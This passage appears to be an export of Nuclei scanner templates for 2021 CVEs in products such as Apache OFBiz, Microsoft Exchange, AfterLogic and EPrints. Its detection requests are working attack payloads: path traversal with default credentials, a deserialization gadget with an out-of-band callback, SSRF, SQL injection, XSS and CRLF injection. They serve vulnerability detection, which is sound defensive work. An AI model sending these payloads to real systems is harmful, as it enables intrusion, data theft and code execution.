DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"caldav_public_user\"\n - \"GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 404\n# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950", "hash": "dbb01a8b5f6b4459e4b0cc616990936e", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308308" }, "name": "CVE-2021-26294.yaml", "content": "id: CVE-2021-26294\n\ninfo:\n name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Information Disclosure\n author: johnk3r\n severity: high\n description: |\n AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to read all files under the web root.\n reference:\n - https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26294\n - https://github.com/Threekiii/Awesome-POC\n - https://github.com/soosmile/POC\n - https://github.com/tzwlhack/Vulnerability\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-26294\n cwe-id: CWE-22\n epss-score: 0.25543\n epss-percentile: 0.96591\n cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: afterlogic\n product: aurora\n fofa-query: \"X-Server: AfterlogicDAVServer\"\n tags: cve2021,cve,afterlogic,exposure,AfterLogic\n\nhttp:\n - raw:\n - |\n GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100946db71c9c0e5b872bed57665de3060aba3d7e263f8bb7d763c03046709ab78a022100a5715e19435bd033d5da6cc980eceb717e143e184e8342d77f893624fec063a0:922c64590222798bb761d5b6d8e72950", "hash": "c5e27f145d15db7a3f1860709223d6ec", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308309" }, "name": "CVE-2021-26295.yaml", "content": "id: CVE-2021-26295\n\ninfo:\n name: Apache OFBiz <17.12.06 - Arbitrary Code Execution\n author: madrobot\n severity: critical\n description: |\n Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability.\n reference:\n - https://github.com/yumusb/CVE-2021-26295-POC\n - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html\n - https://github.com/zhzyker/exphub/tree/master/ofbiz\n - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26295\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-26295\n cwe-id: CWE-502\n epss-score: 0.97465\n epss-percentile: 0.99956\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: ofbiz\n shodan-query: \"OFBiz.Visitor=\"\n ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex\n tags: cve2021,cve,packetstorm,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"errorMessage\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"OFBiz.Visitor=\"\n# digest: 4b0a00483046022100e04458e25cbecebcd58811ac23c6174bce44be12837d57ec0e89d7cbf3f996ac02210094dd842930966ba832f8c767196969e556ed6c5dae58db9b461e66f7eefa4786:922c64590222798bb761d5b6d8e72950", "hash": "43da5a2b3c7b44160df3451fef5f198f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830a" }, "name": "CVE-2021-26475.yaml", "content": "id: CVE-2021-26475\n\ninfo:\n name: EPrints 3.4.2 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.\n reference:\n - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf\n - https://files.eprints.org/2548/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26475\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26475\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eprints\n product: eprints\n tags: cve2021,cve,xss,eprints,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202452d5fb2331fc4cd220e2b60231d049e3b532911c4d99f8e529d0144c7b0609022100ca6708d82d87e98408b4170a72a55b202ee7bdeff2a6dc258707cdd881354d6b:922c64590222798bb761d5b6d8e72950", "hash": "d39a905622fec211f257989a8325aa5e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830b" }, "name": "CVE-2021-26598.yaml", "content": "id: CVE-2021-26598\n\ninfo:\n name: ImpressCMS <1.4.3 - Incorrect Authorization\n author: gy741,pdteam\n severity: medium\n description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.\n remediation: |\n Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.\n reference:\n - https://hackerone.com/reports/1081137\n - http://karmainsecurity.com/KIS-2022-03\n - https://github.com/ImpressCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26598\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-26598\n cwe-id: CWE-287\n epss-score: 0.00506\n epss-percentile: 0.74005\n cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: impresscms\n product: impresscms\n shodan-query: http.html:\"ImpressCMS\"\n tags: cve,cve2021,hackerone,impresscms,unauth,cms\n\nhttp:\n - raw:\n - |\n GET /misc.php?action=showpopups&type=friend HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n - |\n GET /include/findusers.php?token={{token}} HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - 'last_login'\n - 'user_regdate'\n - 'uname'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - \"REQUEST' value='(.*?)'\"\n - 'REQUEST\" value=\"(.*?)\"'\n internal: true\n# digest: 490a004630440220212c67e7bb70c702c7016c3707bc652545339b2bf7432cd9856554bf94c4aca7022059f173bc4a50d952ad2daecb41b5db846709ffa51383e8c68eec3f1232702572:922c64590222798bb761d5b6d8e72950", "hash": "f6cfa985bc25a53523750b38d3afb9b0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830c" }, "name": "CVE-2021-26702.yaml", "content": "id: CVE-2021-26702\n\ninfo:\n name: EPrints 3.4.2 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.\n reference:\n - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf\n - https://files.eprints.org/2548/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26702\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/grymer/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26702\n cwe-id: CWE-79\n epss-score: 0.00187\n epss-percentile: 0.55045\n cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eprints\n product: eprints\n tags: cve2021,cve,xss,eprints\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009b48ac40178577233170a5f266ee2c7b513aa37f7b23a52a482a075b66751079022100cb0c07b43883f3e7f17d94e7c61f0729594cc79ccec51c2470e9060313d1e9ec:922c64590222798bb761d5b6d8e72950", "hash": "8793ecbeed3cdf7ef71e4bde9c52d810", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830d" }, "name": "CVE-2021-26710.yaml", "content": "id: CVE-2021-26710\n\ninfo:\n name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://vict0ni.me/report2web-xss-frame-injection.html\n - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26710\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26710\n cwe-id: CWE-79\n epss-score: 0.00114\n epss-percentile: 0.44746\n cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redwood\n product: report2web\n tags: cve2021,cve,redwood,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950", "hash": "a7e4557e033b86d6571216cad7369044", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830e" }, "name": "CVE-2021-26723.yaml", "content": "id: CVE-2021-26723\n\ninfo:\n name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2.\n reference:\n - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html\n - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205\n - https://jenzabar.com/blog\n - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26723\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26723\n cwe-id: CWE-79\n epss-score: 0.07461\n epss-percentile: 0.93477\n cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jenzabar\n product: jenzabar\n tags: cve2021,cve,packetstorm,jenzabar,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022015c16d5c72f64fa026e48a1f863962d923527709b62ec881a563bccc792ff84a022010b46416ae8abc326958a0fd90e2df9159f95afb4615b86068dc15bd734ea504:922c64590222798bb761d5b6d8e72950", "hash": "a3e2964433b9dfe01129e41dae14b270", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30830f" }, "name": "CVE-2021-26812.yaml", "content": "id: CVE-2021-26812\n\ninfo:\n name: Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting\n author: aceseven (digisec360)\n severity: medium\n description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the \"sessionpriv.php\" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability.\n reference:\n - https://github.com/udima-university/moodle-mod_jitsi/issues/67\n - https://nvd.nist.gov/vuln/detail/CVE-2021-26812\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-26812\n cwe-id: CWE-79\n epss-score: 0.00464\n epss-percentile: 0.72797\n cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:*\n metadata:\n max-request: 1\n vendor: jitsi\n product: meet\n framework: moodle\n tags: cve2021,cve,moodle,jitsi,xss,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"alert(document.domain);\"\n\n - type: word\n part: header\n words:\n - \"MoodleSession\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ebda609c7ab89f085291e361b7d1484576e1270e57d3c66c3086a510088bf420022100dd880ddaa420f7476ba79dc50f12cbc0f7d5c2a225b28a3654c575a703e4838e:922c64590222798bb761d5b6d8e72950", "hash": "0dd653c7572737a9aee5a666566ac365", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308310" }, "name": "CVE-2021-26855.yaml", "content": "id: CVE-2021-26855\n\ninfo:\n name: Microsoft Exchange Server SSRF Vulnerability\n author: madrobot\n severity: critical\n description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.\n remediation: Apply the appropriate security update.\n reference:\n - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855\n - https://proxylogon.com/#timeline\n - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse\n - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-26855\n cwe-id: CWE-918\n epss-score: 0.97507\n epss-percentile: 0.9998\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n shodan-query: vuln:CVE-2021-26855\n tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev\n\nhttp:\n - raw:\n - |\n GET /owa/auth/x.js HTTP/1.1\n Host: {{Hostname}}\n Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950", "hash": "539912fe18d65db60f9e8b3451d14341", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308311" }, "name": "CVE-2021-27124.yaml", "content": "id: CVE-2021-27124\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: medium\n description: |\n SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27124\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-27124\n cwe-id: CWE-89\n epss-score: 0.01251\n epss-percentile: 0.85241\n cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: doctor_appointment_system_project\n product: doctor_appointment_system\n tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project\n\nhttp:\n - raw:\n - |\n POST /patient/search_result.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"Doctor Appoinment System\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950", "hash": "4cb727cf4c7af9eb00fba7cfe4901550", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308312" }, "name": "CVE-2021-27132.yaml", "content": "id: CVE-2021-27132\n\ninfo:\n name: Sercomm VD625 Smart Modems - CRLF Injection\n author: geeknik\n severity: critical\n description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to Carriage Return Line Feed (CRLF) injection via the Content-Disposition header.\n impact: |\n Successful exploitation of this vulnerability could lead to various attacks, including session hijacking, cross-site scripting (XSS), and cache poisoning.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132\n - http://sercomm.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27132\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27132\n cwe-id: CWE-74\n epss-score: 0.04569\n epss-percentile: 0.92334\n cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sercomm\n product: agcombo_vd625_firmware\n tags: cve2021,cve,crlf,injection,sercomm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Disposition: attachment;filename=test.txt\"\n - \"Set-Cookie:CRLFInjection=Test\"\n - \"Location: interact.sh\"\n - \"X-XSS-Protection:0\"\n condition: and\n\n - type: status\n part: header\n status:\n - 404\n# digest: 4a0a00473045022100c3c3ca233f54bacea5f71f78ea26b8267179e45ee6c3a7364dcc8acd6241805202200be48b9424898ee1b2e1029e0a0361512f63313a91b2df49e94a43ab6940d9a2:922c64590222798bb761d5b6d8e72950", "hash": "46af02094b629d7336de720628359dde", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308313" }, "name": "CVE-2021-27309.yaml", "content": "id: CVE-2021-27309\n\ninfo:\n name: Clansphere CMS 2011.4 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"module\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.\n reference:\n - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27309\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27309\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42925\n cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: csphere\n product: clansphere\n tags: cve2021,cve,clansphere,xss,cms,unauth,csphere\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">.php'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950", "hash": "6f83de39d21c1523b7a93ee268b7f333", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308314" }, "name": "CVE-2021-27310.yaml", "content": "id: CVE-2021-27310\n\ninfo:\n name: Clansphere CMS 2011.4 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the \"language\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27310\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27310\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42925\n cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: csphere\n product: clansphere\n tags: cve2021,cve,xss,clansphere,csphere\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c4d6bb7af75b7f3a5accdbe8eb2cb10b8ac70a355e26cae903fd300883998e31022100a430ae5f4c7bf7057dfe5020dfce175c166844cd56e48a64b4f338400e4573c8:922c64590222798bb761d5b6d8e72950", "hash": "25fdd5e841cb12528b7e5b1e274f2a86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308315" }, "name": "CVE-2021-27314.yaml", "content": "id: CVE-2021-27314\n\ninfo:\n name: Doctor Appointment System 1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html\n - http://packetstormsecurity.com/files/161642/Doctor-Appointment-System-1.0-Blind-SQL-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27314\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n 